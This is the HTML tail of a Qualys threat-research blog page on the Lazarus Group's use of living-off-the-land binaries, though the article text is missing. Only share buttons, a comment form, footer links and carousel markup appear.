href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns" title="Share on Facebook" aria-label="Share on Facebook" role="button" rel="nofollow" class="shariff-link" style="; background-color:#6A778B; color:#fff" target="_blank"><span class="shariff-icon" style=""><svg width="32px" height="20px" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 32"><path fill="#3b5998" d="M17.1 0.2v4.7h-2.8q-1.5 0-2.1 0.6t-0.5 1.9v3.4h5.2l-0.7 5.3h-4.5v13.6h-5.5v-13.6h-4.5v-5.3h4.5v-3.9q0-3.3 1.9-5.2t5-1.8q2.6 0 4.1 0.2z"/></svg></span></a></li><li class="shariff-button twitter" style="background-color:#97A0AF"><a href="https://twitter.com/share?url=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns&text=LolZarus%3A%20Lazarus%20Group%20Incorporating%20Lolbins%20into%20Campaigns&via=qualys" title="Share on X" aria-label="Share on X" role="button" rel="noopener nofollow" class="shariff-link" style="; background-color:#6A778B; color:#fff" target="_blank"><span class="shariff-icon" style=""><svg width="32px" height="20px" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill="#000" d="M14.258 10.152L23.176 0h-2.113l-7.747 8.813L7.133 0H0l9.352 13.328L0 23.973h2.113l8.176-9.309 6.531 9.309h7.133zm-2.895 3.293l-.949-1.328L2.875 1.56h3.246l6.086 8.523.945 1.328 7.91 11.078h-3.246zm0 0"/></svg></span></a></li><li class="shariff-button mailto" style="background-color:#97A0AF"><a href="mailto:?body=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns&subject=LolZarus%3A%20Lazarus%20Group%20Incorporating%20Lolbins%20into%20Campaigns" title="Send by email" aria-label="Send by email" role="button" rel="noopener nofollow" class="shariff-link" style="; background-color:#6A778B; color:#fff"><span class="shariff-icon" style=""><svg width="32px" height="20px" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path fill="#999" d="M32 12.7v14.2q0 1.2-0.8 2t-2 0.9h-26.3q-1.2 0-2-0.9t-0.8-2v-14.2q0.8 0.9 1.8 1.6 6.5 4.4 8.9 6.1 1 0.8 1.6 1.2t1.7 0.9 2 0.4h0.1q0.9 0 2-0.4t1.7-0.9 1.6-1.2q3-2.2 8.9-6.1 1-0.7 1.8-1.6zM32 7.4q0 1.4-0.9 2.7t-2.2 2.2q-6.7 4.7-8.4 5.8-0.2 0.1-0.7 0.5t-1 0.7-0.9 0.6-1.1 0.5-0.9 0.2h-0.1q-0.4 0-0.9-0.2t-1.1-0.5-0.9-0.6-1-0.7-0.7-0.5q-1.6-1.1-4.7-3.2t-3.6-2.6q-1.1-0.7-2.1-2t-1-2.5q0-1.4 0.7-2.3t2.1-0.9h26.3q1.2 0 2 0.8t0.9 2z"/></svg></span></a></li></ul></div></div></div> </div> </div> <div class='q-post__tags-wrapper'> </div> </footer> </article> <div class="q-comments__show-button js-q-comments-button"> <span class='text'>Share your Comments</span> <span class='arrow-icon'><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 14"><path fill="#FFF" d="M20.469.409l2.122 2.122-11.061 11.06L.469 2.531 2.591.409l8.939 8.94z"/></svg></span></div> <div id="comments" class="comments-area"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">Comments <small><a rel="nofollow" id="cancel-comment-reply-link" href="/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://blog.qualys.com/wp-comments-post.php?wpe-comment-post=qualysblog" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p><p class="comment-form-comment"><label for="comment">Comment</label><textarea id="comment" name="comment" cols="45" rows="6" minlength="10" placeholder="Share your thoughts" aria-required="true" required></textarea></p><div class="field-wrapper"><p class="comment-form-author"><label for="author">Name</label><input id="author" name="author" type="text" placeholder="Name" value="" size="20" minlength="4" required /></p> <p class="comment-form-email"><label for="email">Email</label><input id="email" name="email" type="email" placeholder="Email" value="" size="30" required /></p></div> <p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p> <div class="g-recaptcha" data-sitekey="6Lc58QoqAAAAALGk25W8X6NC5w_JwiPPf_JA78rv"></div><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="POST" /> <input type='hidden' name='comment_post_ID' value='29363' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="db27863e1c" /></p><input type="hidden" id="ct_checkjs_06138bc5af6023646ede0e1f7c1eac75" name="ct_checkjs" value="0" /><script>setTimeout(function(){var ct_input_name = "ct_checkjs_06138bc5af6023646ede0e1f7c1eac75";if (document.getElementById(ct_input_name) !== null) {var ct_input_value = document.getElementById(ct_input_name).value;document.getElementById(ct_input_name).value = document.getElementById(ct_input_name).value.replace(ct_input_value, '366396619');}}, 1000);</script><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="32"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> </div> </main> </div> </div> <footer id="colophon" class="site-footer q-footer"> <div class="q-footer__container"> <div class="q-footer__row"> <div class="q-footer__column--wide q-footer__column--desktop"> <h2 class="q-footer__heading"> Join the <span class="nowrap">discussion today!</span> </h2> <p class="q-footer__copy"> <strong>Learn</strong> more about Qualys and industry best practices. </p> <p class="q-footer__copy"> <strong>Share</strong> what you know and build a reputation. </p> <p class="q-footer__copy"> <strong>Secure</strong> your systems and improve security for everyone. </p> <div class="q-footer__search"> <span class="q-button__start-a-discussion q-button__light-blue q-button-with-arrow"> <a href="https://discussions.qualys.com/discussion/create!input.jspa"> <span>Start a discussion</span> </a> </span> </div> <div class="q-footer__social"> <ul id="social-menu" class="q-social-list"><li id="menu-item-26477" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26477"><a target="_blank" rel="noopener" href="https://twitter.com/qualys"><svg class="q-social-list__icon" role="img" aria-label="Qualys on Twitter" width="20" height="20" xmlns="http://www.w3.org/2000/svg" viewBox="0 148.7 610.7 496.3" enable-background="new 0 148.7 610.7 496.3"><title>Twitter</title><path fill="#FFF" d="M192.1 645c-70.8 0-136.7-20.7-192.1-56.2 9.8 1.1 19.9 1.8 29.9 1.8 58.7 0 112.8-20.1 155.7-53.6-54.7-1.1-101.2-37.3-117-87.1 7.6 1.6 15.4 2.2 23.7 2.2 11.4 0 22.6-1.6 33.1-4.5-57.5-11.6-100.6-62.1-100.6-122.9v-1.6c17 9.4 36.2 15 56.7 15.6-33.5-22.4-55.8-60.6-55.8-104.2 0-23 6.3-44.4 17-63 61.6 75.9 153.9 126 258 131.1-2.2-9.2-3.4-18.8-3.4-28.6 0-69.2 56.1-125.3 125.3-125.3 36 0 68.6 15.2 91.4 39.5 28.8-5.6 55.6-15.9 79.7-30.4-9.4 29.3-29 53.8-54.9 69.5 25.2-3.1 49.6-9.8 71.9-19.7-16.8 25-38 47.1-62.5 64.8.2 5.4.4 10.7.4 16.3 0 165.4-126.2 356.3-356.5 356.3"></path></svg></a></li> <li id="menu-item-26478" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26478"><a target="_blank" rel="noopener" href="https://www.linkedin.com/company/qualys"><svg class="q-social-list__icon" role="img" aria-label="Qualys on LinkedIn" width="16" height="16" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36" enable-background="new 0 0 36 36"><title>LinkedIn</title><path fill="#FFF" d="M33.3 0h-30.6c-1.5 0-2.7 1.2-2.7 2.6v30.8c0 1.4 1.2 2.6 2.7 2.6h30.7c1.5 0 2.7-1.2 2.7-2.6v-30.8c-.1-1.4-1.3-2.6-2.8-2.6zm-22.6 30.7h-5.4v-17.2h5.3v17.2zm-2.7-19.6c-1.7 0-3.1-1.4-3.1-3.1 0-1.7 1.4-3 3.1-3 1.7 0 3.1 1.4 3.1 3.1 0 1.7-1.4 3-3.1 3zm22.7 19.6h-5.3v-8.4c0-2 0-4.6-2.8-4.6s-3.2 2.2-3.2 4.4v8.5h-5.4v-17.1h5.1v2.3h.1c.7-1.4 2.5-2.8 5.1-2.8 5.4 0 6.4 3.6 6.4 8.2v9.5z"></path></svg></a></li> <li id="menu-item-26479" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26479"><a target="_blank" rel="noopener" href="https://www.facebook.com/qualys"><svg class="q-social-list__icon" role="img" aria-label="Qualys on Facebook" width="16" height="16" xmlns="http://www.w3.org/2000/svg" viewBox="0 90 611.8 612.2" enable-background="new 0 90 611.8 612.2"><title>Facebook</title><path fill="#FFF" d="M578.3 90h-544.6c-18.6 0-33.7 15.1-33.7 33.7v544.4c0 18.6 15.1 33.7 33.7 33.7h293v-236.9h-79.7v-92.4h79.8v-67.9c0-79.1 48.4-122 118.8-122 33.7 0 62.8 2.5 71.3 3.7v82.5h-48.9c-38.3 0-45.9 18.1-45.9 44.9v58.9h91.5l-11.9 92.4h-79.6v237.1h155.9c18.6 0 33.7-15.1 33.7-33.7v-544.7c.3-18.6-14.8-33.7-33.4-33.7z"></path></svg></a></li> <li id="menu-item-26480" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26480"><a target="_blank" rel="noopener" href="https://www.youtube.com/user/QualysGuard"><svg class="q-social-list__icon" role="img" aria-label="Qualys on YouTube" width="22" height="22" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 1021.5 718.4" enable-background="new 0 0 1021.5 718.4"><title>YouTube</title><path fill="#E0E0E0" d="M647.3 366.3l-242.1-161.6 276 144-33.9 17.6"></path><path fill="#FFF" d="M1011.2 155s-10-70.4-40.6-101.4c-38.8-40.7-82.4-40.9-102.3-43.3-142.9-10.3-357.4-10.3-357.4-10.3h-.4s-214.4 0-357.4 10.3c-20 2.4-63.5 2.6-102.3 43.3-30.6 31-40.6 101.4-40.6 101.4s-10.2 82.6-10.2 165.3v77.5c0 82.7 10.2 165.3 10.2 165.3s10 70.4 40.6 101.4c38.9 40.7 89.9 39.4 112.6 43.7 81.7 7.8 347.3 10.3 347.3 10.3s214.6-.3 357.6-10.7c20-2.4 63.5-2.6 102.3-43.3 30.6-31 40.6-101.4 40.6-101.4s10.2-82.7 10.2-165.3v-77.5c.1-82.7-10.2-165.3-10.2-165.3m-605.9 336.7v-287l276 144-276 143z"></path></svg></a></li> <li id="menu-item-26481" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26481"><a target="_blank" rel="noopener" href="https://vimeo.com/qualys"><svg class="q-social-list__icon" role="img" aria-label="Qualys on Vimeo" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 86.67"><title>Vimeo</title><path fill="#FFF" d="M100 20.05q-.72 14.63-20.44 40.06Q59.16 86.67 45 86.67q-8.74 0-14.79-16.17l-8.02-29.66q-4.49-16.17-9.64-16.18-1.12 0-7.85 4.72L0 23.31q7.4-6.52 14.59-13 9.87-8.55 14.82-9 11.67-1.12 14.37 16 2.91 18.47 4 23 3.36 15.32 7.41 15.31 3.14 0 9.43-9.94t6.73-15.13q.9-8.58-6.73-8.58a18.7 18.7 0 0 0-7.4 1.64Q64.63-.66 85.42 0 100.84.47 100 20.05z"></path></svg></a></li> </ul> </div> </div> <div class="q-footer__column q-footer__column--nav"> <section id="nav_menu-2" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Qualys</h3><div class="menu-footer-qualys-container"><ul id="menu-footer-qualys" class="menu"><li id="menu-item-26499" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26499"><a title="Information Security and Compliance | Qualys, Inc." href="https://www.qualys.com/">Qualys.com</a></li> <li id="menu-item-26500" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26500"><a title="Free Trial | Qualys, Inc." href="https://www.qualys.com/community-edition/">Qualys Community Edition</a></li> <li id="menu-item-26565" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26565"><a href="https://store.qualys.com/">Qualys Merchandise Store</a></li> </ul></div></section><section id="nav_menu-3" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Qualys Communities</h3><div class="menu-footer-qualys-communities-container"><ul id="menu-footer-qualys-communities" class="menu"><li id="menu-item-26501" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26501"><a href="https://community.qualys.com/vulnerability-management/">Vulnerability Management</a></li> <li id="menu-item-26502" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26502"><a href="https://community.qualys.com/policy-compliance/">Policy Compliance</a></li> <li id="menu-item-26503" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26503"><a href="https://community.qualys.com/pci-compliance/">PCI Compliance</a></li> <li id="menu-item-26504" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26504"><a href="https://community.qualys.com/web-app-scanning/">Web App Scanning</a></li> <li id="menu-item-26505" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26505"><a href="https://community.qualys.com/web-app-firewall/">Web App Firewall</a></li> <li id="menu-item-26506" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26506"><a href="https://community.qualys.com/continuous-monitoring/">Continuous Monitoring</a></li> <li id="menu-item-26507" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26507"><a href="https://community.qualys.com/security-assessment-questionnaire/">Security Assessment Questionnaire</a></li> <li id="menu-item-26508" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26508"><a href="https://community.qualys.com/threat-protection/">Threat Protection</a></li> <li id="menu-item-26509" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26509"><a href="https://community.qualys.com/asset-inventory/">Asset Inventory</a></li> <li id="menu-item-26510" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26510"><a href="https://community.qualys.com/asset-view/">AssetView</a></li> <li id="menu-item-26511" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26511"><a href="https://community.qualys.com/cmdb-sync/">CMDB Sync</a></li> <li id="menu-item-26512" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26512"><a href="https://community.qualys.com/endpoint-detection-response/">Endpoint Detection & Response</a></li> <li id="menu-item-26513" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26513"><a href="https://community.qualys.com/security-configuration-assessment/">Security Configuration Assessment</a></li> <li id="menu-item-26514" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26514"><a href="https://community.qualys.com/file-integrity-monitoring/">File Integrity Monitoring</a></li> <li id="menu-item-26515" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26515"><a href="https://community.qualys.com/cloud-inventory/">Cloud Inventory</a></li> <li id="menu-item-26516" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26516"><a href="https://community.qualys.com/certificate-inventory/">Certificate Inventory</a></li> <li id="menu-item-26517" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26517"><a href="https://community.qualys.com/container-security/">Container Security</a></li> <li id="menu-item-26518" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26518"><a href="https://community.qualys.com/cloud-security-assessment/">Cloud Security Assessment</a></li> <li id="menu-item-26519" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26519"><a href="https://community.qualys.com/certificate-assessment/">Certificate Assessment</a></li> <li id="menu-item-26520" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26520"><a href="https://community.qualys.com/out-of-band-configuration-assessment/">Out-of-band Configuration Assessment</a></li> <li id="menu-item-26521" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26521"><a href="https://community.qualys.com/patch-management/">Patch Management</a></li> <li id="menu-item-26522" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26522"><a href="https://community.qualys.com/api/">Developer API</a></li> <li id="menu-item-26523" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26523"><a href="https://community.qualys.com/cloud-agent/">Cloud Agent</a></li> <li id="menu-item-26524" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26524"><a href="https://community.qualys.com/reporting/">Dashboards & Reporting</a></li> </ul></div></section><section id="nav_menu-4" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Discussions</h3><div class="menu-footer-discussions-container"><ul id="menu-footer-discussions" class="menu"><li id="menu-item-26489" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26489"><a href="https://discussions.qualys.com/">All discussions</a></li> <li id="menu-item-26490" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26490"><a href="https://discussions.qualys.com/community/asset-inventory">Global IT Asset Management</a></li> <li id="menu-item-26491" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26491"><a href="https://discussions.qualys.com/community/vulnerability-management">IT Security</a></li> <li id="menu-item-26492" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26492"><a href="https://discussions.qualys.com/community/policy-compliance">Compliance</a></li> <li id="menu-item-26493" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26493"><a href="https://discussions.qualys.com/community/cloud-security">Cloud & Container Security</a></li> <li id="menu-item-26494" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26494"><a href="https://discussions.qualys.com/community/web-application-scanning">Web App Security</a></li> <li id="menu-item-26495" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26495"><a href="https://discussions.qualys.com/community/ssllabs">Certificate Security & SSL Labs</a></li> <li id="menu-item-26496" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26496"><a href="https://discussions.qualys.com/community/developer">Developer API</a></li> </ul></div></section><section id="nav_menu-5" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Blog</h3><div class="menu-footer-blog-container"><ul id="menu-footer-blog" class="menu"><li id="menu-item-26483" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-26483"><a href="https://blog.qualys.com/">All posts</a></li> <li id="menu-item-26484" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26484"><a href="https://blog.qualys.com/qualys-insights">Qualys Insights</a></li> <li id="menu-item-26485" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26485"><a href="https://blog.qualys.com/product-tech">Product and Tech</a></li> <li id="menu-item-26486" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26486"><a href="https://blog.qualys.com/vulnerabilities-threat-research">Vulnerabilities and Threat Research</a></li> <li id="menu-item-26487" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26487"><a href="https://notifications.qualys.com/">Release Notifications</a></li> </ul></div></section><section id="nav_menu-6" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Training</h3><div class="menu-footer-training-container"><ul id="menu-footer-training" class="menu"><li id="menu-item-26526" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26526"><a href="https://www.qualys.com/training/">Overview</a></li> <li id="menu-item-26527" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26527"><a href="https://www.qualys.com/training/#self-paced">Certified Courses</a></li> <li id="menu-item-26528" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26528"><a href="https://www.qualys.com/training/#video-library">Video Library</a></li> <li id="menu-item-26529" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26529"><a href="https://www.qualys.com/training/#instructor-led">Instructor-led Training</a></li> </ul></div></section><section id="nav_menu-7" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Docs</h3><div class="menu-footer-docs-container"><ul id="menu-footer-docs" class="menu"><li id="menu-item-26497" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26497"><a href="https://www.qualys.com/documentation/">Overview</a></li> <li id="menu-item-26498" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26498"><a href="https://www.qualys.com/documentation/release-notes/">Release Notes</a></li> </ul></div></section><section id="nav_menu-8" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Support</h3><div class="menu-footer-support-container"><ul id="menu-footer-support" class="menu"><li id="menu-item-26525" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26525"><a href="https://qualys-secure.force.com/customer/s/">Support Portal</a></li> </ul></div></section> </div> </div> <div class="q-footer__row"> <small class="q-footer__copyright">© 2024 Qualys, Inc. All rights reserved. <a href="https://www.qualys.com/company/privacy/"><span style="white-space: nowrap;">Privacy Policy</span></a> . <a href="https://www.qualys.com/company/accessibility/">Accessibility</a></small> </div> </div> </footer> <img alt="Cleantalk Pixel" title="Cleantalk Pixel" id="apbct_pixel" style="display: none;" src="https://moderate1-v4.cleantalk.org/pixel/dba09330c14be9bf43dfb2fba6d7f545.gif"><div class='q-goto-top-btn js-goto-top-single'><span><svg viewBox="0 0 16 22" xmlns="http://www.w3.org/2000/svg"><path d="m8.56934246 21.55c-.18206438.2813776-.49435704.451275-.8295.451275-.33514295 0-.64743561-.1698974-.8295-.451275l-6.771-10.808c-.387-.616.078-1.401.83-1.401h5.668l-.003-8.415c0-.51.495-.926 1.106-.926.542 0 .995.328 1.088.759l.017.167.003 8.415h5.66100004c.693 0 1.14.66.912 1.245l-.08.156zm.279-4.041 3.95800004-6.316h-3.96000004v6.316zm-2.212.004v-6.32h-3.959l3.957 6.32z" transform="matrix(1 0 0 -1 .000658 22.001274)"/></svg></span></div> <div id="jp-carousel-loading-overlay"> <div id="jp-carousel-loading-wrapper"> <span id="jp-carousel-library-loading"> </span> </div> </div> <div class="jp-carousel-overlay" style="display: none;"> <div class="jp-carousel-container">  <div class="jp-carousel-wrap swiper-container jp-carousel-swiper-container jp-carousel-transitions" itemscope itemtype="https://schema.org/ImageGallery"> <div class="jp-carousel swiper-wrapper"></div> <div class="jp-swiper-button-prev swiper-button-prev"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskPrev" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="9" height="12"> <path d="M16.2072 16.59L11.6496 12L16.2072 7.41L14.8041 6L8.8335 12L14.8041 18L16.2072 16.59Z" fill="white"/> </mask> <g mask="url(#maskPrev)"> <rect x="0.579102" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> </div> <div class="jp-swiper-button-next swiper-button-next"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskNext" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="8" height="12"> <path d="M8.59814 16.59L13.1557 12L8.59814 7.41L10.0012 6L15.9718 12L10.0012 18L8.59814 16.59Z" fill="white"/> </mask> <g mask="url(#maskNext)"> <rect x="0.34375" width="23.8822" height="24" fill="#FFFFFF"/> </g> </svg> </div> </div>  <div class="jp-carousel-close-hint"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskClose" mask-type="alpha" maskUnits="userSpaceOnUse" x="5" y="5" width="15" height="14"> <path d="M19.3166 6.41L17.9135 5L12.3509 10.59L6.78834 5L5.38525 6.41L10.9478 12L5.38525 17.59L6.78834 19L12.3509 13.41L17.9135 19L19.3166 17.59L13.754 12L19.3166 6.41Z" fill="white"/> </mask> <g mask="url(#maskClose)"> <rect x="0.409668" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> </div>  <div class="jp-carousel-info"> <div class="jp-carousel-info-footer"> <div class="jp-carousel-pagination-container"> <div class="jp-swiper-pagination swiper-pagination"></div> <div class="jp-carousel-pagination"></div> </div> <div class="jp-carousel-photo-title-container"> <h2 class="jp-carousel-photo-caption"></h2> </div> <div class="jp-carousel-photo-icons-container"> <a href="#" class="jp-carousel-icon-btn jp-carousel-icon-info" aria-label="Toggle photo metadata visibility"> <span class="jp-carousel-icon"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskInfo" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20"> <path fill-rule="evenodd" clip-rule="evenodd" d="M12.7537 2C7.26076 2 2.80273 6.48 2.80273 12C2.80273 17.52 7.26076 22 12.7537 22C18.2466 22 22.7046 17.52 22.7046 12C22.7046 6.48 18.2466 2 12.7537 2ZM11.7586 7V9H13.7488V7H11.7586ZM11.7586 11V17H13.7488V11H11.7586ZM4.79292 12C4.79292 16.41 8.36531 20 12.7537 20C17.142 20 20.7144 16.41 20.7144 12C20.7144 7.59 17.142 4 12.7537 4C8.36531 4 4.79292 7.59 4.79292 12Z" fill="white"/> </mask> <g mask="url(#maskInfo)"> <rect x="0.8125" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> </span> </a> <a href="#" class="jp-carousel-icon-btn jp-carousel-icon-comments" aria-label="Toggle photo comments visibility"> <span class="jp-carousel-icon"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskComments" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20"> <path fill-rule="evenodd" clip-rule="evenodd" d="M4.3271 2H20.2486C21.3432 2 22.2388 2.9 22.2388 4V16C22.2388 17.1 21.3432 18 20.2486 18H6.31729L2.33691 22V4C2.33691 2.9 3.2325 2 4.3271 2ZM6.31729 16H20.2486V4H4.3271V18L6.31729 16Z" fill="white"/> </mask> <g mask="url(#maskComments)"> <rect x="0.34668" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> <span class="jp-carousel-has-comments-indicator" aria-label="This image has comments."></span> </span> </a> </div> </div> <div class="jp-carousel-info-extra"> <div class="jp-carousel-info-content-wrapper"> <div class="jp-carousel-photo-title-container"> <h2 class="jp-carousel-photo-title"></h2> </div> <div class="jp-carousel-comments-wrapper"> <div id="jp-carousel-comments-loading"> <span>Loading Comments...</span> </div> <div class="jp-carousel-comments"></div> <div id="jp-carousel-comment-form-container"> <span id="jp-carousel-comment-form-spinner"> </span> <div id="jp-carousel-comment-post-results"></div> <form id="jp-carousel-comment-form"> <label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label> <textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..." ></textarea> <div id="jp-carousel-comment-form-submit-and-info-wrapper"> <div id="jp-carousel-comment-form-commenting-as"> <fieldset> <label for="jp-carousel-comment-form-email-field">Email (Required)</label> <input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field" /> </fieldset> <fieldset> <label for="jp-carousel-comment-form-author-field">Name (Required)</label> <input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field" /> </fieldset> <fieldset> <label for="jp-carousel-comment-form-url-field">Website</label> <input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field" /> </fieldset> </div> <input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment" /> </div> </form> </div> </div> <div class="jp-carousel-image-meta"> <div class="jp-carousel-title-and-caption"> <div class="jp-carousel-photo-info"> <h3 class="jp-carousel-caption" itemprop="caption description"></h3> </div> <div class="jp-carousel-photo-description"></div> </div> <ul class="jp-carousel-image-exif" style="display: none;"></ul> <a class="jp-carousel-image-download" href="#" target="_blank" style="display: none;"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="3" y="3" width="19" height="18"> <path fill-rule="evenodd" clip-rule="evenodd" d="M5.84615 5V19H19.7775V12H21.7677V19C21.7677 20.1 20.8721 21 19.7775 21H5.84615C4.74159 21 3.85596 20.1 3.85596 19V5C3.85596 3.9 4.74159 3 5.84615 3H12.8118V5H5.84615ZM14.802 5V3H21.7677V10H19.7775V6.41L9.99569 16.24L8.59261 14.83L18.3744 5H14.802Z" fill="white"/> </mask> <g mask="url(#mask0)"> <rect x="0.870605" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> <span class="jp-carousel-download-text"></span> </a> <div class="jp-carousel-image-map" style="display: none;"></div> </div> </div> </div> </div> </div> </div> <link rel='stylesheet' id='jetpack-carousel-swiper-css-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/modules/carousel/swiper-bundle.css?ver=13.9.1' media='all' /> <link rel='stylesheet' id='jetpack-carousel-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel.css?ver=13.9.1' media='all' /> <link rel='stylesheet' id='shariffcss-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/shariff/css/shariff.min.css?ver=4.6.14' media='all' /> <style id='core-block-supports-inline-css'> .wp-container-core-columns-is-layout-1{flex-wrap:nowrap;}.wp-container-core-columns-is-layout-2{flex-wrap:nowrap;}.wp-container-core-columns-is-layout-3{flex-wrap:nowrap;}.wp-container-core-columns-is-layout-4{flex-wrap:nowrap;} </style> <script 